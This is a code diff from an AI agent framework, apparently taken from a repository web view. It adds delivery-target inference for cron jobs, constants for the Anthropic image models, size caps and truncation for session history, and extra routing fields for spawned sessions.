// [Fix Issue 3] Infer delivery target from session key for isolated jobs if not provided
|
||||
if (
|
||||
opts?.agentSessionKey &&
|
||||
job &&
|
||||
typeof job === "object" &&
|
||||
"payload" in job &&
|
||||
(job as { payload?: { kind?: string } }).payload?.kind === "agentTurn"
|
||||
) {
|
||||
const deliveryValue = (job as { delivery?: unknown }).delivery;
|
||||
const delivery = isRecord(deliveryValue) ? deliveryValue : undefined;
|
||||
const modeRaw = typeof delivery?.mode === "string" ? delivery.mode : "";
|
||||
const mode = modeRaw.trim().toLowerCase();
|
||||
const hasTarget =
|
||||
(typeof delivery?.channel === "string" && delivery.channel.trim()) ||
|
||||
(typeof delivery?.to === "string" && delivery.to.trim());
|
||||
const shouldInfer =
|
||||
(deliveryValue == null || delivery) && mode !== "none" && !hasTarget;
|
||||
if (shouldInfer) {
|
||||
const inferred = inferDeliveryFromSessionKey(opts.agentSessionKey);
|
||||
if (inferred) {
|
||||
(job as { delivery?: unknown }).delivery = {
|
||||
...delivery,
|
||||
...inferred,
|
||||
} satisfies CronDelivery;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
const contextMessages =
|
||||
typeof params.contextMessages === "number" && Number.isFinite(params.contextMessages)
|
||||
? params.contextMessages
|
||||
|
||||
@@ -24,6 +24,8 @@ import {
|
||||
} from "./image-tool.helpers.js";
|
||||
|
||||
const DEFAULT_PROMPT = "Describe the image.";
|
||||
const ANTHROPIC_IMAGE_PRIMARY = "anthropic/claude-opus-4-6";
|
||||
const ANTHROPIC_IMAGE_FALLBACK = "anthropic/claude-opus-4-5";
|
||||
|
||||
export const __testing = {
|
||||
decodeDataUrl,
|
||||
@@ -117,7 +119,7 @@ export function resolveImageModelConfigForTool(params: {
|
||||
} else if (primary.provider === "openai" && openaiOk) {
|
||||
preferred = "openai/gpt-5-mini";
|
||||
} else if (primary.provider === "anthropic" && anthropicOk) {
|
||||
preferred = "anthropic/claude-opus-4-5";
|
||||
preferred = ANTHROPIC_IMAGE_PRIMARY;
|
||||
}
|
||||
|
||||
if (preferred?.trim()) {
|
||||
@@ -125,7 +127,7 @@ export function resolveImageModelConfigForTool(params: {
|
||||
addFallback("openai/gpt-5-mini");
|
||||
}
|
||||
if (anthropicOk) {
|
||||
addFallback("anthropic/claude-opus-4-5");
|
||||
addFallback(ANTHROPIC_IMAGE_FALLBACK);
|
||||
}
|
||||
// Don't duplicate primary in fallbacks.
|
||||
const pruned = fallbacks.filter((ref) => ref !== preferred);
|
||||
@@ -138,7 +140,7 @@ export function resolveImageModelConfigForTool(params: {
|
||||
// Cross-provider fallback when we can't pair with the primary provider.
|
||||
if (openaiOk) {
|
||||
if (anthropicOk) {
|
||||
addFallback("anthropic/claude-opus-4-5");
|
||||
addFallback(ANTHROPIC_IMAGE_FALLBACK);
|
||||
}
|
||||
return {
|
||||
primary: "openai/gpt-5-mini",
|
||||
@@ -146,7 +148,10 @@ export function resolveImageModelConfigForTool(params: {
|
||||
};
|
||||
}
|
||||
if (anthropicOk) {
|
||||
return { primary: "anthropic/claude-opus-4-5" };
|
||||
return {
|
||||
primary: ANTHROPIC_IMAGE_PRIMARY,
|
||||
fallbacks: [ANTHROPIC_IMAGE_FALLBACK],
|
||||
};
|
||||
}
|
||||
|
||||
return null;
|
||||
|
||||
@@ -2,7 +2,9 @@ import { Type } from "@sinclair/typebox";
|
||||
import type { AnyAgentTool } from "./common.js";
|
||||
import { loadConfig } from "../../config/config.js";
|
||||
import { callGateway } from "../../gateway/call.js";
|
||||
import { capArrayByJsonBytes } from "../../gateway/session-utils.fs.js";
|
||||
import { isSubagentSessionKey, resolveAgentIdFromSessionKey } from "../../routing/session-key.js";
|
||||
import { truncateUtf16Safe } from "../../utils.js";
|
||||
import { jsonResult, readStringParam } from "./common.js";
|
||||
import {
|
||||
createAgentToAgentPolicy,
|
||||
@@ -19,6 +21,131 @@ const SessionsHistoryToolSchema = Type.Object({
|
||||
includeTools: Type.Optional(Type.Boolean()),
|
||||
});
|
||||
|
||||
const SESSIONS_HISTORY_MAX_BYTES = 80 * 1024;
|
||||
const SESSIONS_HISTORY_TEXT_MAX_CHARS = 4000;
|
||||
|
||||
function truncateHistoryText(text: string): { text: string; truncated: boolean } {
|
||||
if (text.length <= SESSIONS_HISTORY_TEXT_MAX_CHARS) {
|
||||
return { text, truncated: false };
|
||||
}
|
||||
const cut = truncateUtf16Safe(text, SESSIONS_HISTORY_TEXT_MAX_CHARS);
|
||||
return { text: `${cut}\n…(truncated)…`, truncated: true };
|
||||
}
|
||||
|
||||
function sanitizeHistoryContentBlock(block: unknown): { block: unknown; truncated: boolean } {
|
||||
if (!block || typeof block !== "object") {
|
||||
return { block, truncated: false };
|
||||
}
|
||||
const entry = { ...(block as Record<string, unknown>) };
|
||||
let truncated = false;
|
||||
const type = typeof entry.type === "string" ? entry.type : "";
|
||||
if (typeof entry.text === "string") {
|
||||
const res = truncateHistoryText(entry.text);
|
||||
entry.text = res.text;
|
||||
truncated ||= res.truncated;
|
||||
}
|
||||
if (type === "thinking") {
|
||||
if (typeof entry.thinking === "string") {
|
||||
const res = truncateHistoryText(entry.thinking);
|
||||
entry.thinking = res.text;
|
||||
truncated ||= res.truncated;
|
||||
}
|
||||
// The encrypted signature can be extremely large and is not useful for history recall.
|
||||
if ("thinkingSignature" in entry) {
|
||||
delete entry.thinkingSignature;
|
||||
truncated = true;
|
||||
}
|
||||
}
|
||||
if (typeof entry.partialJson === "string") {
|
||||
const res = truncateHistoryText(entry.partialJson);
|
||||
entry.partialJson = res.text;
|
||||
truncated ||= res.truncated;
|
||||
}
|
||||
if (type === "image") {
|
||||
const data = typeof entry.data === "string" ? entry.data : undefined;
|
||||
const bytes = data ? data.length : undefined;
|
||||
if ("data" in entry) {
|
||||
delete entry.data;
|
||||
truncated = true;
|
||||
}
|
||||
entry.omitted = true;
|
||||
if (bytes !== undefined) {
|
||||
entry.bytes = bytes;
|
||||
}
|
||||
}
|
||||
return { block: entry, truncated };
|
||||
}
|
||||
|
||||
function sanitizeHistoryMessage(message: unknown): { message: unknown; truncated: boolean } {
|
||||
if (!message || typeof message !== "object") {
|
||||
return { message, truncated: false };
|
||||
}
|
||||
const entry = { ...(message as Record<string, unknown>) };
|
||||
let truncated = false;
|
||||
// Tool result details often contain very large nested payloads.
|
||||
if ("details" in entry) {
|
||||
delete entry.details;
|
||||
truncated = true;
|
||||
}
|
||||
if ("usage" in entry) {
|
||||
delete entry.usage;
|
||||
truncated = true;
|
||||
}
|
||||
if ("cost" in entry) {
|
||||
delete entry.cost;
|
||||
truncated = true;
|
||||
}
|
||||
|
||||
if (typeof entry.content === "string") {
|
||||
const res = truncateHistoryText(entry.content);
|
||||
entry.content = res.text;
|
||||
truncated ||= res.truncated;
|
||||
} else if (Array.isArray(entry.content)) {
|
||||
const updated = entry.content.map((block) => sanitizeHistoryContentBlock(block));
|
||||
entry.content = updated.map((item) => item.block);
|
||||
truncated ||= updated.some((item) => item.truncated);
|
||||
}
|
||||
if (typeof entry.text === "string") {
|
||||
const res = truncateHistoryText(entry.text);
|
||||
entry.text = res.text;
|
||||
truncated ||= res.truncated;
|
||||
}
|
||||
return { message: entry, truncated };
|
||||
}
|
||||
|
||||
function jsonUtf8Bytes(value: unknown): number {
|
||||
try {
|
||||
return Buffer.byteLength(JSON.stringify(value), "utf8");
|
||||
} catch {
|
||||
return Buffer.byteLength(String(value), "utf8");
|
||||
}
|
||||
}
|
||||
|
||||
function enforceSessionsHistoryHardCap(params: {
|
||||
items: unknown[];
|
||||
bytes: number;
|
||||
maxBytes: number;
|
||||
}): { items: unknown[]; bytes: number; hardCapped: boolean } {
|
||||
if (params.bytes <= params.maxBytes) {
|
||||
return { items: params.items, bytes: params.bytes, hardCapped: false };
|
||||
}
|
||||
|
||||
const last = params.items.at(-1);
|
||||
const lastOnly = last ? [last] : [];
|
||||
const lastBytes = jsonUtf8Bytes(lastOnly);
|
||||
if (lastBytes <= params.maxBytes) {
|
||||
return { items: lastOnly, bytes: lastBytes, hardCapped: true };
|
||||
}
|
||||
|
||||
const placeholder = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: "[sessions_history omitted: message too large]",
|
||||
},
|
||||
];
|
||||
return { items: placeholder, bytes: jsonUtf8Bytes(placeholder), hardCapped: true };
|
||||
}
|
||||
|
||||
function resolveSandboxSessionToolsVisibility(cfg: ReturnType<typeof loadConfig>) {
|
||||
return cfg.agents?.defaults?.sandbox?.sessionToolsVisibility ?? "spawned";
|
||||
}
|
||||
@@ -131,10 +258,26 @@ export function createSessionsHistoryTool(opts?: {
|
||||
params: { sessionKey: resolvedKey, limit },
|
||||
});
|
||||
const rawMessages = Array.isArray(result?.messages) ? result.messages : [];
|
||||
const messages = includeTools ? rawMessages : stripToolMessages(rawMessages);
|
||||
const selectedMessages = includeTools ? rawMessages : stripToolMessages(rawMessages);
|
||||
const sanitizedMessages = selectedMessages.map((message) => sanitizeHistoryMessage(message));
|
||||
const contentTruncated = sanitizedMessages.some((entry) => entry.truncated);
|
||||
const cappedMessages = capArrayByJsonBytes(
|
||||
sanitizedMessages.map((entry) => entry.message),
|
||||
SESSIONS_HISTORY_MAX_BYTES,
|
||||
);
|
||||
const droppedMessages = cappedMessages.items.length < selectedMessages.length;
|
||||
const hardened = enforceSessionsHistoryHardCap({
|
||||
items: cappedMessages.items,
|
||||
bytes: cappedMessages.bytes,
|
||||
maxBytes: SESSIONS_HISTORY_MAX_BYTES,
|
||||
});
|
||||
return jsonResult({
|
||||
sessionKey: displayKey,
|
||||
messages,
|
||||
messages: hardened.items,
|
||||
truncated: droppedMessages || contentTruncated || hardened.hardCapped,
|
||||
droppedMessages: droppedMessages || hardened.hardCapped,
|
||||
contentTruncated,
|
||||
bytes: hardened.bytes,
|
||||
});
|
||||
},
|
||||
};
|
||||
|
||||
@@ -231,6 +231,10 @@ export function createSessionsSpawnTool(opts?: {
|
||||
message: task,
|
||||
sessionKey: childSessionKey,
|
||||
channel: requesterOrigin?.channel,
|
||||
to: requesterOrigin?.to ?? undefined,
|
||||
accountId: requesterOrigin?.accountId ?? undefined,
|
||||
threadId:
|
||||
requesterOrigin?.threadId != null ? String(requesterOrigin.threadId) : undefined,
|
||||
idempotencyKey: childIdem,
|
||||
deliver: false,
|
||||
lane: AGENT_LANE_SUBAGENT,
|
||||
|
||||
Reference in New Issue
Block a user